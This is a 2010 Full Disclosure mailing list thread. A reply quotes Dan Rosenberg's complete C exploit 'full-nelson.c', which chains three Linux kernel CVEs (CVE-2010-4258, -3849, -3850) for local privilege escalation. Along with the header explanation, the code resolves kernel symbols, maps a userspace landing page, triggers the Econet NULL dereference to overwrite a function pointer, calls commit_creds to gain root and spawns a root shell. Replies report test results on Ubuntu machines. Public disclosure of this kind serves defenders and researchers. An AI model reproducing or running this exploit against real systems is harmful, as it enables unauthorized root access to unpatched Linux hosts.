Full Disclosure mailing list archives
Re: Linux kernel exploit
From: Guillaume Friloux <guillaume.friloux () asp64 com>
Date: Wed, 08 Dec 2010 09:12:36 +0100
Doesnt work here on Ubuntu 10.10 (VirtualBox) clean install (but with all updates) with only an “apt-get install build-essential”
kuri@kuri-VirtualBox:~$ cat /etc/lsb-release DISTRIB_ID=Ubuntu DISTRIB_RELEASE=10.10 DISTRIB_CODENAME=maverick DISTRIB_DESCRIPTION="Ubuntu 10.10" kuri@kuri-VirtualBox:~$ uname -aLinux kuri-VirtualBox 2.6.35-23-generic #41-Ubuntu SMP Wed Nov 24 10:18:49 UTC 2010 i686 GNU/Linux
kuri@kuri-VirtualBox:~$ gcc -o exploit exploit.c kuri@kuri-VirtualBox:~$ ./exploit [*] Resolving kernel addresses... [+] Resolved econet_ioctl to 0xf81ca340 [+] Resolved econet_ops to 0xf81ca440 [+] Resolved commit_creds to 0xc016c8d0 [+] Resolved prepare_kernel_cred to 0xc016cd20 [*] Calculating target... [*] Triggering payload... [*] Exploit failed to get root. kuri@kuri-VirtualBox:~$ On 07/12/2010 22:21, Ryan Sears wrote:
Yep, just tested it in an Ubuntu 10.10 sandbox I have (running kernel 2.6.35-22-generic). Works as expected. Great job Dan. You're full of win! Regards, Ryan Sears ----- Original Message ----- From: "Cal Leeming [Simplicity Media Ltd]"<cal.leeming () simplicitymedialtd co uk> To: "Dan Rosenberg"<dan.j.rosenberg () gmail com> Cc: full-disclosure () lists grok org uk, bugtraq () securityfocus com Sent: Tuesday, December 7, 2010 4:06:44 PM GMT -05:00 US/Canada Eastern Subject: Re: [Full-disclosure] Linux kernel exploit Anyone tested this in sandbox yet? On 07/12/2010 20:25, Dan Rosenberg wrote:Hi all, I've included here a proof-of-concept local privilege escalation exploit for Linux. Please read the header for an explanation of what's going on. Without further ado, I present full-nelson.c: Happy hacking, Dan --snip-- /* * Linux Kernel<= 2.6.37 local privilege escalation * by Dan Rosenberg * @djrbliss on twitter * * Usage: * gcc full-nelson.c -o full-nelson * ./full-nelson * * This exploit leverages three vulnerabilities to get root, all of which were * discovered by Nelson Elhage: * * CVE-2010-4258 * ------------- * This is the interesting one, and the reason I wrote this exploit. If a * thread is created via clone(2) using the CLONE_CHILD_CLEARTID flag, a NULL * word will be written to a user-specified pointer when that thread exits. * This write is done using put_user(), which ensures the provided destination * resides in valid userspace by invoking access_ok(). However, Nelson * discovered that when the kernel performs an address limit override via * set_fs(KERNEL_DS) and the thread subsequently OOPSes (via BUG, page fault, * etc.), this override is not reverted before calling put_user() in the exit * path, allowing a user to write a NULL word to an arbitrary kernel address. * Note that this issue requires an additional vulnerability to trigger. * * CVE-2010-3849 * ------------- * This is a NULL pointer dereference in the Econet protocol. By itself, it's * fairly benign as a local denial-of-service. It's a perfect candidate to * trigger the above issue, since it's reachable via sock_no_sendpage(), which * subsequently calls sendmsg under KERNEL_DS. * * CVE-2010-3850 * ------------- * I wouldn't be able to reach the NULL pointer dereference and trigger the * OOPS if users weren't able to assign Econet addresses to arbitrary * interfaces due to a missing capabilities check. * * In the interest of public safety, this exploit was specifically designed to * be limited: * * * The particular symbols I resolve are not exported on Slackware or Debian * * Red Hat does not support Econet by default * * CVE-2010-3849 and CVE-2010-3850 have both been patched by Ubuntu and * Debian * * However, the important issue, CVE-2010-4258, affects everyone, and it would * be trivial to find an unpatched DoS under KERNEL_DS and write a slightly * more sophisticated version of this that doesn't have the roadblocks I put in * to prevent abuse by script kiddies. * * Tested on unpatched Ubuntu 10.04 kernels, both x86 and x86-64. * * NOTE: the exploit process will deadlock and stay in a zombie state after you * exit your root shell because the Econet thread OOPSes while holding the * Econet mutex. It wouldn't be too hard to fix this up, but I didn't bother. * * Greets to spender, taviso, stealth, pipacs, jono, kees, and bla */ #include<stdio.h> #include<sys/socket.h> #include<fcntl.h> #include<sys/ioctl.h> #include<string.h> #include<net/if.h> #include<sched.h> #include<stdlib.h> #include<signal.h> #include<sys/utsname.h> #include<sys/mman.h> #include<unistd.h> /* How many bytes should we clear in our * function pointer to put it into userspace? */ #ifdef __x86_64__ #define SHIFT 24 #define OFFSET 3 #else #define SHIFT 8 #define OFFSET 1 #endif /* thanks spender... */ unsigned long get_kernel_sym(char *name) { FILE *f; unsigned long addr; char dummy; char sname[512]; struct utsname ver; int ret; int rep = 0; int oldstyle = 0; f = fopen("/proc/kallsyms", "r"); if (f == NULL) { f = fopen("/proc/ksyms", "r"); if (f == NULL) goto fallback; oldstyle = 1; } repeat: ret = 0; while(ret != EOF) { if (!oldstyle) ret = fscanf(f, "%p %c %s\n", (void **)&addr,&dummy, sname); else { ret = fscanf(f, "%p %s\n", (void **)&addr, sname); if (ret == 2) { char *p; if (strstr(sname, "_O/") || strstr(sname, "_S.")) continue; p = strrchr(sname, '_'); if (p> ((char *)sname + 5)&& !strncmp(p - 3, "smp", 3)) { p = p - 4; while (p> (char *)sname&& *(p - 1) == '_') p--; *p = '\0'; } } } if (ret == 0) { fscanf(f, "%s\n", sname); continue; } if (!strcmp(name, sname)) { fprintf(stdout, " [+] Resolved %s to %p%s\n", name, (void *)addr, rep ? " (via System.map)" : ""); fclose(f); return addr; } } fclose(f); if (rep) return 0; fallback: uname(&ver); if (strncmp(ver.release, "2.6", 3)) oldstyle = 1; sprintf(sname, "/boot/System.map-%s", ver.release); f = fopen(sname, "r"); if (f == NULL) return 0; rep = 1; goto repeat; } typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred); typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred); _commit_creds commit_creds; _prepare_kernel_cred prepare_kernel_cred; static int __attribute__((regparm(3))) getroot(void * file, void * vma) { commit_creds(prepare_kernel_cred(0)); return -1; } /* Why do I do this? Because on x86-64, the address of * commit_creds and prepare_kernel_cred are loaded relative * to rip, which means I can't just copy the above payload * into my landing area. */ void __attribute__((regparm(3))) trampoline() { #ifdef __x86_64__ asm("mov $getroot, %rax; call *%rax;"); #else asm("mov $getroot, %eax; call *%eax;"); #endif } /* Triggers a NULL pointer dereference in econet_sendmsg * via sock_no_sendpage, so it's under KERNEL_DS */ int trigger(int * fildes) { int ret; struct ifreq ifr; memset(&ifr, 0, sizeof(ifr)); strncpy(ifr.ifr_name, "eth0", IFNAMSIZ); ret = ioctl(fildes[2], SIOCSIFADDR,&ifr); if(ret< 0) { printf("[*] Failed to set Econet address.\n"); return -1; } splice(fildes[3], NULL, fildes[1], NULL, 128, 0); splice(fildes[0], NULL, fildes[2], NULL, 128, 0); /* Shouldn't get here... */ exit(0); } int main(int argc, char * argv[]) { unsigned long econet_ops, econet_ioctl, target, landing; int fildes[4], pid; void * newstack, * payload; /* Create file descriptors now so there are two references to them after cloning...otherwise the child will never return because it deadlocks when trying to unlock various mutexes after OOPSing */ pipe(fildes); fildes[2] = socket(PF_ECONET, SOCK_DGRAM, 0); fildes[3] = open("/dev/zero", O_RDONLY); if(fildes[0]< 0 || fildes[1]< 0 || fildes[2]< 0 || fildes[3]< 0) { printf("[*] Failed to open file descriptors.\n"); return -1; } /* Resolve addresses of relevant symbols */ printf("[*] Resolving kernel addresses...\n"); econet_ioctl = get_kernel_sym("econet_ioctl"); econet_ops = get_kernel_sym("econet_ops"); commit_creds = (_commit_creds) get_kernel_sym("commit_creds"); prepare_kernel_cred = (_prepare_kernel_cred) get_kernel_sym("prepare_kernel_cred"); if(!econet_ioctl || !commit_creds || !prepare_kernel_cred || !econet_ops) { printf("[*] Failed to resolve kernel symbols.\n"); return -1; } if(!(newstack = malloc(65536))) { printf("[*] Failed to allocate memory.\n"); return -1; } printf("[*] Calculating target...\n"); target = econet_ops + 10 * sizeof(void *) - OFFSET; /* Clear the higher bits */ landing = econet_ioctl<< SHIFT>> SHIFT; payload = mmap((void *)(landing& ~0xfff), 2 * 4096, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, 0, 0); if ((long)payload == -1) { printf("[*] Failed to mmap() at target address.\n"); return -1; } memcpy((void *)landing,&trampoline, 1024); clone((int (*)(void *))trigger, (void *)((unsigned long)newstack + 65536), CLONE_VM | CLONE_CHILD_CLEARTID | SIGCHLD, &fildes, NULL, NULL, target); sleep(1); printf("[*] Triggering payload...\n"); ioctl(fildes[2], 0, NULL); if(getuid()) { printf("[*] Exploit failed to get root.\n"); return -1; } printf("[*] Got root!\n"); execl("/bin/sh", "/bin/sh", NULL); } _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Attachment:
guillaume_friloux.vcf
Description:
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Linux kernel exploit Dan Rosenberg (Dec 07)
- Re: Linux kernel exploit Cal Leeming [Simplicity Media Ltd] (Dec 07)
- Re: Linux kernel exploit Ryan Sears (Dec 07)
- Re: Linux kernel exploit Guillaume Friloux (Dec 08)
- Re: Linux kernel exploit Sherwyn (Dec 08)
- Re: Linux kernel exploit dave b (Dec 08)
- Re: Linux kernel exploit Ryan Sears (Dec 07)
- Re: Linux kernel exploit Ed Carp (Dec 08)
- Re: Linux kernel exploit nArEn ÁĹ0ПΞ Ŵ0ĹŦஇ (Dec 08)
- Re: Linux kernel exploit Cal Leeming [Simplicity Media Ltd] (Dec 07)
- Re: Linux kernel exploit Benji (Dec 08)
- Re: Linux kernel exploit David Flores (Dec 08)
- Re: Linux kernel exploit Rem7ter (Dec 08)